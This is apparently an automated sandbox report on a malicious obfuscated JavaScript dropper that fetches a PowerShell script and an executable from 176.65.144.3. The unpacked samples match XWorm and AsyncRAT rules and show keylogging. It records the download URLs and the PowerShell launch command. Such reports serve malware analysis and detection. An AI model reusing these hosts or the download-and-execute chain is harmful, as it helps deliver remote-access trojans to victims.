            Source: global trafficHTTP traffic detected: GET /dev/BRAINNN.ps1 HTTP/1.1Accept: */*Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 176.65.144.3Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /dev/BRAINN.exe HTTP/1.1Host: 176.65.144.3Connection: Keep-Alive
            Source: JXCJKXCJHKJHXCJHKXCXCJHK.exe, 0000000A.00000002.1333571921.0000000002AAC000.00000004.00000800.00020000.00000000.sdmp, JXCJKXCJHKJHXCJHKXCXCJHK.exe, 0000000A.00000002.1333571921.0000000002A9B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://176.65.144.3
            Source: wscript.exe, 00000000.00000003.1276614530.0000028B3BBBF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.65.144.3/
            Source: wscript.exe, 00000000.00000003.1276614530.0000028B3BBBF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.65.144.3/c
            Source: JXCJKXCJHKJHXCJHKXCXCJHK.exe, 0000000A.00000002.1333571921.0000000002A3B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://176.65.144.3/dev/BRAINN.exe
            Source: JXCJKXCJHKJHXCJHKXCXCJHK.exe, 0000000A.00000002.1333571921.0000000002A3B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://176.65.144.3/dev/BRAINN.exeP
            Source: wscript.exe, 00000000.00000003.1354586423.0000028B3B80D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1356002274.0000028B3999F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1357854813.0000028B399A2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1359382525.0000028B3BBBD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1361085119.0000028B398D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.65.144.3/dev/BRAINNN.ps1
            Source: wscript.exe, 00000000.00000002.1363143006.0000028B3BBBE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1276614530.0000028B3BBBF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1359382525.0000028B3BBBD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.65.144.3/dev/BRAINNN.ps1K
            Source: wscript.exe, 00000000.00000002.1361650157.0000028B399A7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1355833170.0000028B3999C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1356002274.0000028B3999F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1357854813.0000028B399A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.65.144.3/dev/BRAINNN.ps1O
            Source: wscript.exe, 00000000.00000003.1276614530.0000028B3BBBF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.65.144.3/dev/BRAINNN.ps1Q
            Source: wscript.exe, 00000000.00000003.1276614530.0000028B3BBBF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.65.144.3/dev/BRAINNN.ps1i
            Source: wscript.exe, 00000000.00000003.1276614530.0000028B3BBBF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.65.144.3/dev/BRAINNN.ps1r
            Source: wscript.exe, 00000000.00000003.1357528885.0000028B3993B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.65.144.3/dev/BRAINNN.ps1su5otI5WCZe1Y%12%02
            Source: powershell.exe, 00000008.00000002.1320594242.00000258107A7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1346116332.000002581EF5F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1346116332.000002581EE25000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
            Source: powershell.exe, 00000008.00000002.1320594242.000002580EF82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
            Source: powershell.exe, 00000008.00000002.1320594242.000002580ED51000.00000004.00000800.00020000.00000000.sdmp, JXCJKXCJHKJHXCJHKXCXCJHK.exe, 0000000A.00000002.1333571921.0000000002A9B000.00000004.00000800.00020000.00000000.sdmp, JXCJKXCJHKJHXCJHKXCXCJHK.exe, 0000000C.00000002.2464253717.0000000002FF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: powershell.exe, 00000008.00000002.1320594242.0000025810364000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
            Source: powershell.exe, 00000008.00000002.1320594242.000002580EF82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
            Source: powershell.exe, 00000008.00000002.1320594242.000002580ED51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
            Source: powershell.exe, 00000008.00000002.1346116332.000002581EE25000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
            Source: powershell.exe, 00000008.00000002.1346116332.000002581EE25000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
            Source: powershell.exe, 00000008.00000002.1346116332.000002581EE25000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
            Source: powershell.exe, 00000008.00000002.1320594242.000002580EF82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
            Source: wscript.exe, 00000000.00000002.1363053568.0000028B3BBB3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
            Source: powershell.exe, 00000008.00000002.1320594242.00000258107A7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1346116332.000002581EF5F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1346116332.000002581EE25000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
            Source: powershell.exe, 00000008.00000002.1320594242.0000025810364000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.org
            Source: powershell.exe, 00000008.00000002.1320594242.0000025810364000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.orgX

            Key, Mouse, Clipboard, Microphone and Screen Capturing

            barindex
            Source: 10.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.2ab9f3c.2.raw.unpack, XLogger.cs.Net Code: KeyboardLayout
            Source: 10.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.2ace474.0.raw.unpack, XLogger.cs.Net Code: KeyboardLayout
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior

            System Summary

            barindex
            Source: 12.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
            Source: 12.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 10.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.2ab9f3c.2.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
            Source: 10.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.2ab9f3c.2.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 10.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.2ab56fb.1.raw.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
            Source: 10.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.2ab56fb.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 10.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.2ab9f3c.2.raw.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
            Source: 10.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.2ab9f3c.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 10.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.2ace474.0.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
            Source: 10.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.2ace474.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 10.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.2ace474.0.raw.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
            Source: 10.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.2ace474.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 0000000A.00000002.1333571921.0000000002ACE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 0000000C.00000002.2457857484.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 0000000A.00000002.1333571921.0000000002AB5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: Process Memory Space: powershell.exe PID: 3904, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
            Source: JXCJKXCJHKJHXCJHKXCXCJHK.exe.8.drStatic PE information: section name: 3YZ&:\O
            Source: X1Client.exe.12.drStatic PE information: section name: 3YZ&:\O
            Source: JXCJKXCJHKJHXCJHKXCXCJHK.exe.8.drStatic PE information: section name:
            Source: X1Client.exe.12.drStatic PE information: section name:
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeJump to dropped file
            Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
            Source: C:\Windows\System32\wscript.exeCOM Object queried: XML HTTP HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F6D90F16-9C73-11D3-B32E-00C04F990BB4}Jump to behavior
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\WTRTRWFSHS.ps1"
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\WTRTRWFSHS.ps1"Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeCode function: 10_2_0109992010_2_01099920
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeCode function: 10_2_010911E010_2_010911E0
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeCode function: 10_2_0109084810_2_01090848
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeCode function: 10_2_010928D010_2_010928D0
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeCode function: 10_2_0109083910_2_01090839
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeCode function: 10_2_010928C110_2_010928C1
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeCode function: 12_2_014C453012_2_014C4530
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeCode function: 12_2_014C135812_2_014C1358
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeCode function: 12_2_014C3F3812_2_014C3F38
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeCode function: 12_2_06D02F6812_2_06D02F68
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeCode function: 12_2_06D0383812_2_06D03838
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeCode function: 12_2_06D0578312_2_06D05783
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeCode function: 12_2_06D07C4312_2_06D07C43
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeCode function: 12_2_06D02C2012_2_06D02C20
            Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe 6C97ECC2C61D32ED69642E73D95768D47CFF87F2E6F71D3561ED5B23FFEDE4E5
            Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\X1Client.exe 6C97ECC2C61D32ED69642E73D95768D47CFF87F2E6F71D3561ED5B23FFEDE4E5
            Source: obfuscated (1).jsInitial sample: Strings found which are bigger than 50
            Source: 12.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
            Source: 12.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 10.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.2ab9f3c.2.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
            Source: 10.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.2ab9f3c.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 10.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.2ab56fb.1.raw.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
            Source: 10.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.2ab56fb.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 10.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.2ab9f3c.2.raw.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
            Source: 10.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.2ab9f3c.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 10.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.2ace474.0.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
            Source: 10.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.2ace474.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 10.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.2ace474.0.raw.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
            Source: 10.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.2ace474.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 0000000A.00000002.1333571921.0000000002ACE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 0000000C.00000002.2457857484.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 0000000A.00000002.1333571921.0000000002AB5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: Process Memory Space: powershell.exe PID: 3904, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
            Source: JXCJKXCJHKJHXCJHKXCXCJHK.exe.8.drStatic PE information: Section: 3YZ&:\O ZLIB complexity 1.0013427734375
            Source: X1Client.exe.12.drStatic PE information: Section: 3YZ&:\O ZLIB complexity 1.0013427734375
            Source: 10.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.2ab9f3c.2.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
            Source: 10.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.2ab9f3c.2.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
            Source: 10.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.2ab9f3c.2.raw.unpack, AlgorithmAES.csCryptographic APIs: 'TransformFinalBlock'
            Source: 10.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.2ace474.0.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
            Source: 10.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.2ace474.0.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
            Source: 10.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.2ace474.0.raw.unpack, AlgorithmAES.csCryptographic APIs: 'TransformFinalBlock'
            Source: 10.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.2ab9f3c.2.raw.unpack, Settings.csBase64 encoded string: 'vLspmNzxDA1pyZdF+B9gWI4z6OXvTO5U3LKyfNloAniRIAUfkQaItu6cGeaPTSDZ', 'GUe3Q0yDyst2eCWFpaXh+UiExhz73zD8kbFV1B6+/o/Vq8Eo/jVOZqQlysx4Ri3i'
            Source: 10.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.2ace474.0.raw.unpack, Settings.csBase64 encoded string: 'vLspmNzxDA1pyZdF+B9gWI4z6OXvTO5U3LKyfNloAniRIAUfkQaItu6cGeaPTSDZ', 'GUe3Q0yDyst2eCWFpaXh+UiExhz73zD8kbFV1B6+/o/Vq8Eo/jVOZqQlysx4Ri3i'
            Source: 10.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.2ace474.0.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: 10.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.2ace474.0.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 10.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.2ab9f3c.2.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: 10.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.2ab9f3c.2.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winJS@8/10@0/2
            Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\BRAINNN[1].ps1Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeMutant created: NULL
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeMutant created: \Sessions\1\BaseNamedObjects\IQ0PdUIpTkHdHJyj
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4476:120:WilError_03
            Source: C:\Windows\System32\wscript.exeFile created: C:\Temp\WTRTRWFSHS.ps1Jump to behavior
            Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: obfuscated (1).jsVirustotal: Detection: 20%
            Source: obfuscated (1).jsReversingLabs: Detection: 26%
            Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\obfuscated (1).js"
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\WTRTRWFSHS.ps1"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe "C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe"
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeProcess created: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe "C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe"
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\WTRTRWFSHS.ps1"Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe "C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe" Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeProcess created: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe "C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe"Jump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: msxml3.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: mlang.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
